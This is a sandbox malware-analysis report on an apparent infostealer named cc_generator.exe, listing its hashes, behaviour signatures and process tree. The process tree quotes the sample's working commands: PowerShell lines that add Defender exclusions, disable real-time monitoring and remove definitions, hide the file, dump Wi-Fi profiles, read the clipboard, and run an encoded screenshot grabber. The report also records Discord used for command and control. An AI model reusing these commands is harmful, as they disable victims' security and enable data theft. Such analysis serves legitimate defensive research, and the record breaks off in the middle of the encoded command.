Analysis
-
max time kernel
9s -
max time network
15s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 23:17
Behavioral task
behavioral1
Sample
cc_generator.exe
Resource
win7-20240221-en
General
-
Target
cc_generator.exe
-
Size
6.9MB
-
MD5
d0ca6d5d4fe5fa540867ab50fd240f1b
-
SHA1
39708fe9d8deb122e0b02d358628d55a074ed598
-
SHA256
bfb2a0bbaf0fc6355cfce8f94a4b675d33734b31ed41a2d0d242d462ce487490
-
SHA512
9bb04a3942c04ca69e1cd7acad75faf61ec921b74a5517b7ecc6be587cc1fe3889d37f50f8e7e95053d7fed5ff99f86dcbc8fc6b39c6396c52fdc7d444c94233
-
SSDEEP
196608:NrNz0YCeNTfm/pf+xk4dWRGtrbWOjgWyM:3Ny/pWu4kRGtrbvMWyM
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1328 powershell.exe 3120 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cc_generator.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 1352 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe 408 cc_generator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x00070000000233fb-21.dat upx behavioral2/memory/408-25-0x00007FFEF90D0000-0x00007FFEF96B8000-memory.dmp upx behavioral2/files/0x00070000000233ee-27.dat upx behavioral2/files/0x00070000000233f9-29.dat upx behavioral2/memory/408-30-0x00007FFF0CD70000-0x00007FFF0CD94000-memory.dmp upx behavioral2/memory/408-48-0x00007FFF0D9D0000-0x00007FFF0D9DF000-memory.dmp upx behavioral2/files/0x00070000000233f5-47.dat upx behavioral2/files/0x00070000000233f4-46.dat upx behavioral2/files/0x00070000000233f3-45.dat upx behavioral2/files/0x00070000000233f2-44.dat upx behavioral2/files/0x00070000000233f1-43.dat upx behavioral2/files/0x00070000000233f0-42.dat upx behavioral2/files/0x00070000000233ef-41.dat upx behavioral2/files/0x00070000000233ed-40.dat upx behavioral2/files/0x0007000000023400-39.dat upx behavioral2/files/0x00070000000233ff-38.dat upx behavioral2/files/0x00070000000233fe-37.dat upx behavioral2/files/0x00070000000233fa-34.dat upx behavioral2/files/0x00070000000233f8-33.dat upx behavioral2/memory/408-54-0x00007FFF0CD00000-0x00007FFF0CD2D000-memory.dmp upx behavioral2/memory/408-56-0x00007FFF0D700000-0x00007FFF0D719000-memory.dmp upx behavioral2/memory/408-58-0x00007FFF093C0000-0x00007FFF093E3000-memory.dmp upx behavioral2/memory/408-60-0x00007FFEF8BE0000-0x00007FFEF8D53000-memory.dmp upx behavioral2/memory/408-64-0x00007FFF0CCF0000-0x00007FFF0CCFD000-memory.dmp upx behavioral2/memory/408-63-0x00007FFF0CDE0000-0x00007FFF0CDF9000-memory.dmp upx behavioral2/memory/408-68-0x00007FFF088C0000-0x00007FFF08978000-memory.dmp upx behavioral2/memory/408-67-0x00007FFF08CA0000-0x00007FFF08CCE000-memory.dmp upx behavioral2/memory/408-71-0x00007FFEF90D0000-0x00007FFEF96B8000-memory.dmp upx behavioral2/memory/408-72-0x00007FFEF8860000-0x00007FFEF8BD5000-memory.dmp upx behavioral2/memory/408-78-0x00007FFF093B0000-0x00007FFF093BD000-memory.dmp upx behavioral2/memory/408-77-0x00007FFF08A90000-0x00007FFF08AA4000-memory.dmp upx behavioral2/memory/408-76-0x00007FFF0CD70000-0x00007FFF0CD94000-memory.dmp upx behavioral2/memory/408-80-0x00007FFF08630000-0x00007FFF0874C000-memory.dmp upx behavioral2/memory/408-274-0x00007FFF093C0000-0x00007FFF093E3000-memory.dmp upx behavioral2/memory/408-307-0x00007FFEF8860000-0x00007FFEF8BD5000-memory.dmp upx behavioral2/memory/408-311-0x00007FFEF8BE0000-0x00007FFEF8D53000-memory.dmp upx behavioral2/memory/408-310-0x00007FFF08630000-0x00007FFF0874C000-memory.dmp upx behavioral2/memory/408-296-0x00007FFEF90D0000-0x00007FFEF96B8000-memory.dmp upx behavioral2/memory/408-306-0x00007FFF088C0000-0x00007FFF08978000-memory.dmp upx behavioral2/memory/408-305-0x00007FFF08CA0000-0x00007FFF08CCE000-memory.dmp upx behavioral2/memory/408-303-0x00007FFF0CDE0000-0x00007FFF0CDF9000-memory.dmp upx behavioral2/memory/408-297-0x00007FFF0CD70000-0x00007FFF0CD94000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 discord.com 30 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com 3 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1556 WMIC.exe 1164 WMIC.exe 4544 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4104 tasklist.exe 2112 tasklist.exe 3368 tasklist.exe 1000 tasklist.exe 2328 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3864 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1328 powershell.exe 4608 powershell.exe 4608 powershell.exe 1328 powershell.exe 1328 powershell.exe 2788 powershell.exe 2788 powershell.exe 2788 powershell.exe 3120 powershell.exe 3120 powershell.exe 3120 powershell.exe 5060 powershell.exe 5060 powershell.exe 4636 powershell.exe 4636 powershell.exe 4636 powershell.exe 1532 powershell.exe 1532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 4104 tasklist.exe Token: SeIncreaseQuotaPrivilege 412 WMIC.exe Token: SeSecurityPrivilege 412 WMIC.exe Token: SeTakeOwnershipPrivilege 412 WMIC.exe Token: SeLoadDriverPrivilege 412 WMIC.exe Token: SeSystemProfilePrivilege 412 WMIC.exe Token: SeSystemtimePrivilege 412 WMIC.exe Token: SeProfSingleProcessPrivilege 412 WMIC.exe Token: SeIncBasePriorityPrivilege 412 WMIC.exe Token: SeCreatePagefilePrivilege 412 WMIC.exe Token: SeBackupPrivilege 412 WMIC.exe Token: SeRestorePrivilege 412 WMIC.exe Token: SeShutdownPrivilege 412 WMIC.exe Token: SeDebugPrivilege 412 WMIC.exe Token: SeSystemEnvironmentPrivilege 412 WMIC.exe Token: SeRemoteShutdownPrivilege 412 WMIC.exe Token: SeUndockPrivilege 412 WMIC.exe Token: SeManageVolumePrivilege 412 WMIC.exe Token: 33 412 WMIC.exe Token: 34 412 WMIC.exe Token: 35 412 WMIC.exe Token: 36 412 WMIC.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeIncreaseQuotaPrivilege 412 WMIC.exe Token: SeSecurityPrivilege 412 WMIC.exe Token: SeTakeOwnershipPrivilege 412 WMIC.exe Token: SeLoadDriverPrivilege 412 WMIC.exe Token: SeSystemProfilePrivilege 412 WMIC.exe Token: SeSystemtimePrivilege 412 WMIC.exe Token: SeProfSingleProcessPrivilege 412 WMIC.exe Token: SeIncBasePriorityPrivilege 412 WMIC.exe Token: SeCreatePagefilePrivilege 412 WMIC.exe Token: SeBackupPrivilege 412 WMIC.exe Token: SeRestorePrivilege 412 WMIC.exe Token: SeShutdownPrivilege 412 WMIC.exe Token: SeDebugPrivilege 412 WMIC.exe Token: SeSystemEnvironmentPrivilege 412 WMIC.exe Token: SeRemoteShutdownPrivilege 412 WMIC.exe Token: SeUndockPrivilege 412 WMIC.exe Token: SeManageVolumePrivilege 412 WMIC.exe Token: 33 412 WMIC.exe Token: 34 412 WMIC.exe Token: 35 412 WMIC.exe Token: 36 412 WMIC.exe Token: SeIncreaseQuotaPrivilege 4544 WMIC.exe Token: SeSecurityPrivilege 4544 WMIC.exe Token: SeTakeOwnershipPrivilege 4544 WMIC.exe Token: SeLoadDriverPrivilege 4544 WMIC.exe Token: SeSystemProfilePrivilege 4544 WMIC.exe Token: SeSystemtimePrivilege 4544 WMIC.exe Token: SeProfSingleProcessPrivilege 4544 WMIC.exe Token: SeIncBasePriorityPrivilege 4544 WMIC.exe Token: SeCreatePagefilePrivilege 4544 WMIC.exe Token: SeBackupPrivilege 4544 WMIC.exe Token: SeRestorePrivilege 4544 WMIC.exe Token: SeShutdownPrivilege 4544 WMIC.exe Token: SeDebugPrivilege 4544 WMIC.exe Token: SeSystemEnvironmentPrivilege 4544 WMIC.exe Token: SeRemoteShutdownPrivilege 4544 WMIC.exe Token: SeUndockPrivilege 4544 WMIC.exe Token: SeManageVolumePrivilege 4544 WMIC.exe Token: 33 4544 WMIC.exe Token: 34 4544 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2536 wrote to memory of 408 2536 cc_generator.exe 81 PID 2536 wrote to memory of 408 2536 cc_generator.exe 81 PID 408 wrote to memory of 2892 408 cc_generator.exe 85 PID 408 wrote to memory of 2892 408 cc_generator.exe 85 PID 408 wrote to memory of 1432 408 cc_generator.exe 86 PID 408 wrote to memory of 1432 408 cc_generator.exe 86 PID 408 wrote to memory of 3196 408 cc_generator.exe 87 PID 408 wrote to memory of 3196 408 cc_generator.exe 87 PID 408 wrote to memory of 1292 408 cc_generator.exe 91 PID 408 wrote to memory of 1292 408 cc_generator.exe 91 PID 408 wrote to memory of 1112 408 cc_generator.exe 93 PID 408 wrote to memory of 1112 408 cc_generator.exe 93 PID 2892 wrote to memory of 1328 2892 cmd.exe 95 PID 2892 wrote to memory of 1328 2892 cmd.exe 95 PID 1112 wrote to memory of 412 1112 cmd.exe 96 PID 1112 wrote to memory of 412 1112 cmd.exe 96 PID 3196 wrote to memory of 868 3196 cmd.exe 97 PID 3196 wrote to memory of 868 3196 cmd.exe 97 PID 1432 wrote to memory of 4608 1432 cmd.exe 99 PID 1432 wrote to memory of 4608 1432 cmd.exe 99 PID 1292 wrote to memory of 4104 1292 cmd.exe 98 PID 1292 wrote to memory of 4104 1292 cmd.exe 98 PID 408 wrote to memory of 4940 408 cc_generator.exe 160 PID 408 wrote to memory of 4940 408 cc_generator.exe 160 PID 4940 wrote to memory of 640 4940 cmd.exe 161 PID 4940 wrote to memory of 640 4940 cmd.exe 161 PID 408 wrote to memory of 2996 408 cc_generator.exe 104 PID 408 wrote to memory of 2996 408 cc_generator.exe 104 PID 2996 wrote to memory of 1252 2996 cmd.exe 106 PID 2996 wrote to memory of 1252 2996 cmd.exe 106 PID 408 wrote to memory of 2884 408 cc_generator.exe 107 PID 408 wrote to memory of 2884 408 cc_generator.exe 107 PID 2884 wrote to memory of 4544 2884 cmd.exe 109 PID 2884 wrote to memory of 4544 2884 cmd.exe 109 PID 408 wrote to memory of 4032 408 cc_generator.exe 111 PID 408 wrote to memory of 4032 408 cc_generator.exe 111 PID 4032 wrote to memory of 1556 4032 cmd.exe 113 PID 4032 wrote to memory of 1556 4032 cmd.exe 113 PID 408 wrote to memory of 232 408 cc_generator.exe 114 PID 408 wrote to memory of 232 408 cc_generator.exe 114 PID 232 wrote to memory of 4372 232 cmd.exe 116 PID 232 wrote to memory of 4372 232 cmd.exe 116 PID 408 wrote to memory of 2400 408 cc_generator.exe 117 PID 408 wrote to memory of 2400 408 cc_generator.exe 117 PID 408 wrote to memory of 2064 408 cc_generator.exe 118 PID 408 wrote to memory of 2064 408 cc_generator.exe 118 PID 408 wrote to memory of 1284 408 cc_generator.exe 167 PID 408 wrote to memory of 1284 408 cc_generator.exe 167 PID 408 wrote to memory of 1548 408 cc_generator.exe 122 PID 408 wrote to memory of 1548 408 cc_generator.exe 122 PID 408 wrote to memory of 2184 408 cc_generator.exe 125 PID 408 wrote to memory of 2184 408 cc_generator.exe 125 PID 2064 wrote to memory of 3368 2064 cmd.exe 127 PID 2064 wrote to memory of 3368 2064 cmd.exe 127 PID 2400 wrote to memory of 2112 2400 cmd.exe 128 PID 2400 wrote to memory of 2112 2400 cmd.exe 128 PID 408 wrote to memory of 2244 408 cc_generator.exe 129 PID 408 wrote to memory of 2244 408 cc_generator.exe 129 PID 1548 wrote to memory of 2788 1548 cmd.exe 130 PID 1548 wrote to memory of 2788 1548 cmd.exe 130 PID 1284 wrote to memory of 4764 1284 cmd.exe 165 PID 1284 wrote to memory of 4764 1284 cmd.exe 165 PID 408 wrote to memory of 2740 408 cc_generator.exe 132 PID 408 wrote to memory of 2740 408 cc_generator.exe 132 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4372 attrib.exe 3228 attrib.exe 2076 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc_generator.exe"C:\Users\Admin\AppData\Local\Temp\cc_generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Admin\AppData\Local\Temp\cc_generator.exe"C:\Users\Admin\AppData\Local\Temp\cc_generator.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cc_generator.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cc_generator.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'error found', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'error found', 0+16);close()"4⤵PID:868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\cc_generator.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\cc_generator.exe"4⤵
- Views/modifies file attributes
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2184
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2244
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:2740
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1228
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3912
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:1760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgA